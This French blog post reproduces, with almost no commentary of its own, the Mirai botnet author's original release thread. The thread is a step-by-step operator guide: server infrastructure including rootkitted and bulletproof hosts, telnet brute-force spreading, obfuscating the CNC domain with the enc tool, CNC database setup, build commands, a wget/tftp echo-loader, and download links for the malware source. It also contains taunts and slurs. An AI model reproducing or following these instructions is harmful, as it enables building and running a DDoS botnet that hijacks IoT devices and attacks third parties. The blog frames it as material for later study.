Étude du code source du botnet Mirai

  • Infos sur les auteurs du botnet.

En atten­dant de pou­voir me plonger dans son étude, je repro­duit ici le thread d’o­rig­ine de l’au­teur, avant qu’il ne disparaisse:

When I first go in DDoS indus­try, I was­n’t plan­ning on stay­ing in it long. I made my mon­ey, there’s lots of eyes look­ing at IOT now, so it’s time to GTFO. How­ev­er, I know every skid and their mama, it’s their wet dream to have some­thing besides qbot.

So today, I have an amaz­ing release for you. With Mirai, I usu­al­ly pull max 380k bots from tel­net alone. How­ev­er, after the Kreb DDoS, ISPs been slow­ly shut­ting down and clean­ing up their act. Today, max pull is about 300k bots, and dropping.

So, I am your sen­pai, and I will treat you real nice, my hf-chan.

And to every­one that thought they were doing any­thing by hit­ting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 sec­onds for all bots to recon­nect, lol

Also, shoutout to this blog post by malwaremustdie
https://web.archive.org/web/201609302302…-just.html <- back­up in case low qual­i­ty reverse engi­neer unixf­reaxjp decides to edit his posts lol
Had a lot of respect for you, thought you were good revers­er, but you real­ly just com­plete­ly and total­ly failed in revers­ing this bina­ry. “We still have bet­ter kung fu than you kid­dos” don’t make me laugh please, you made so many mis­takes and even con­fused some dif­fer­ent bina­ries with my. LOL

Let me give you some slaps back -
1) port 48101 is not for back con­nect, it is for con­trol to pre­vent mul­ti­ple instances of bot run­ning together
2) /dev/watchdog and /dev/misc are not for “mak­ing the delay”, it for pre­vent­ing sys­tem from hang­ing. This one is low-hang­ing fruit, so sad that you are extreme­ly dumb
3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol “And doing the back­door to con­nect via HTTP on″. you got tripped up by sig­nal flow 😉 try hard­er skiddo
4) Your skele­ton tool sucks ass, it thought the attack decoder was “sin­den style”, but it does not even use a text-based pro­to­col? CNC and bot com­mu­ni­cate over bina­ry protocol
5) you say ‘chroot(“/”) so pre­dictable like tor­lus’ but you don’t under­stand, some oth­ers kill based on cwd. It shows how out-of-the-loop you are with real mal­ware. Go back to skidland

5 slaps for you

Why are you writ­ing reverse engi­neer tools? You can­not even cor­rect­ly reverse in the first place. Please learn some skills first before try­ing to impress oth­ers. Your arro­gance in declar­ing how you “beat me” with your dumb kung-fu state­ment made me laugh so hard while eat­ing my SO had to pat me on the back.

Just as I for­ev­er be free, you will be doomed to medioc­ra­cy forever.

Bare Minimum
2 servers: 1 for CNC + mysql, 1 for scan receiv­er, and 1+ for loading

Pro Set­up (my setup)
2 VPS and 4 servers
— 1 VPS with extreme­ly bul­let­proof host for data­base server
— 1 VPS, rootkit­ted, for scan­Re­ceiv­er and distributor
— 1 serv­er for CNC (used like 2% CPU with 400k bots)
— 3x 10gbps NForce servers for load­ing (dis­trib­u­tor dis­trib­utes to 3 servers equally)

Infra­struc­ture Overview
— To estab­lish con­nec­tion to CNC, bots resolve a domain (resolv.c/resolv.h) and con­nect to that IP address
— Bots brute tel­net using an advanced SYN scan­ner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When find­ing brut­ed result, bot resolves anoth­er domain and reports it. This is chained to a sep­a­rate serv­er to auto­mat­i­cal­ly load onto devices as results come in.
— Brut­ed results are sent by default on port 48101. The util­i­ty called scanListen.go in tools is used to receive brut­ed results (I was get­ting around 500 brut­ed results per sec­ond at peak). If you build in debug mode, you should see the uti­tl­i­ty scan­Lis­ten bina­ry appear in debug folder.

Mirai uses a spread­ing mech­a­nism sim­i­lar to self-rep, but what I call “real-time-load”. Basi­cal­ly, bots brute results, send it to a serv­er lis­ten­ing with scan­Lis­ten util­i­ty, which sends the results to the loader. This loop (brute -> scan­Lis­ten -> load -> brute) is known as real time loading.

The loader can be con­fig­ured to use mul­ti­ple IP address to bypass port exhaus­tion in lin­ux (there are lim­it­ed num­ber of ports avail­able, which means that there is not enough vari­a­tion in tuple to get more than 65k simul­ta­ne­ous out­bound con­nec­tions — in the­o­ry, this val­ue lot less). I would have maybe 60k — 70k simul­ta­ne­ous out­bound con­nec­tions (simul­ta­ne­ous load­ing) spread out across 5 IPs.

Con­fig­ur­ing Bot
Bot has sev­er­al con­fig­u­ra­tion options that are obfus­cat­ed in (table.c/table.h). In ./mirai/bot/table.h you can find most descrip­tions for con­fig­u­ra­tion options. How­ev­er, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

- TABLE_CNC_DOMAIN — Domain name of CNC to con­nect to — DDoS avoid­ance very fun with mirai, peo­ple try to hit my CNC but I update it faster than they can find new IPs, lol. Retards 🙂
TABLE_CNC_PORT — Port to con­nect to, its set to 23 already
TABLE_SCAN_CB_DOMAIN — When find­ing brut­ed results, this domain it is report­ed to
TABLE_SCAN_CB_PORT — Port to con­nect to for brut­ed results, it is set to 48101 already.

In ./mirai/tools you will find some­thing called enc.c — You must com­pile this to out­put things to put in the table.c file

Run this inside mirai directory

./build.sh debug telnet

You will get some errors relat­ed to cross-com­pil­ers not being there if you have not con­fig­ured them. This is ok, won’t affect com­pil­ing the enc tool

Now, in the ./mirai/debug fold­er you should see a com­piled bina­ry called enc. For exam­ple, to get obfus­cat­ed string for domain name for bots to con­nect to, use this:

./debug/enc string fuck.the.police.com

The out­put should look like this

XOR'ing 20 bytes of data...

To update the TABLE_CNC_DOMAIN val­ue for exam­ple, replace that long hex string with the one pro­vid­ed by enc tool. Also, you see “XOR’ing 20 bytes of data”. This val­ue must replace the last argu­ment tas well. So for exam­ple, the table.c line orig­i­nal­ly looks like this

add_entry(TABLE_CNC_DOMAIN, “\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22”, 30); // cnc.changeme.com

Now that we know val­ue from enc tool, we update it like this

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22", 20); // fuck.the.police.com

Some val­ues are strings, some are port (uint16 in net­work order / big endian).

Con­fig­ur­ing CNC

apt-get install mysql-server mysql-client

CNC requires data­base to work. When you install data­base, go into it and run fol­low­ing commands:

This will cre­ate data­base for you. To add your user,

INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, '');

Now, go into file ./mirai/cnc/main.go

Edit these values

const DatabaseAddr string   = ""
const DatabaseUser string   = "root"
const DatabasePass string   = "password"
const DatabaseTable string  = "mirai"

To the infor­ma­tion for the mysql serv­er you just installed

Set­ting Up Cross Compilers
Cross com­pil­ers are easy, fol­low the instruc­tions at this link to set up. You must restart your sys­tem or reload .bashrc file for these changes to take effect.


Build­ing CNC+Bot
The CNC, bot, and relat­ed tools:
1) http://santasbigcandycane.cx/mirai.src.zipTHESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAXBACK IT UP!

2) http://santasbigcandycane.cx/loader.src.zipTHESE LINKS WILL NOT LAST FOREVER, 2 WEEKS MAXBACK IT UP!

How to build bot + CNC
In mirai fold­er, there is build.sh script.

./build.sh debug telnet

Will out­put debug bina­ries of bot that will not dae­mo­nize and print out info about if it can con­nect to CNC, etc, sta­tus of floods, etc. Com­piles to ./mirai/debug folder

./build.sh release telnet

Will out­put pro­duc­tion-ready bina­ries of bot that are extreme­ly stripped, small (about 60K) that should be loaded onto devices. Com­piles all bina­ries in for­mat: “mirai.$ARCH” to ./mirai/release folder

Build­ing Echo Loader
Loader reads tel­net entries from STDIN in fol­low­ing format:

ip:port user:pass

It detects if there is wget or tftp, and tries to down­load the bina­ry using that. If not, it will echoload a tiny bina­ry (about 1kb) that will suf­fice as wget. You can find code to com­pile the tiny down­loader stub h ere

You need to edit your main.c for the dlr to include the HTTP serv­er IP. The idea is, if the iot device doesn have tftp or wget, then it will echo load this 2kb bina­ry, which down­load the real bina­ry, since echo load­ing real­ly slow.
When you com­pile, place your dlr.* files into the fold­er ./bins for the loader


Will build the loader, opti­mized, pro­duc­tion use, no fuss. If you have a file in for­mats used for load­ing, you can do this

cat file.txt | ./loader

Remem­ber to ulimit!

Just so it’s clear, I’m not pro­vid­ing any kind of 1 on 1 help tuto­ri­als or shit, too much time. All scripts and every­thing are includ­ed to set up work­ing bot­net in under 1 hours. I am will­ing to help if you have indi­vid­ual ques­tions (how come CNC not con­nect­ing to data­base, I did this this this blah blah), but not ques­tions like “My bot not con­nect, fix it”

Pour les passionnés de 3D et de Jeux

%d blogueurs aiment cette page :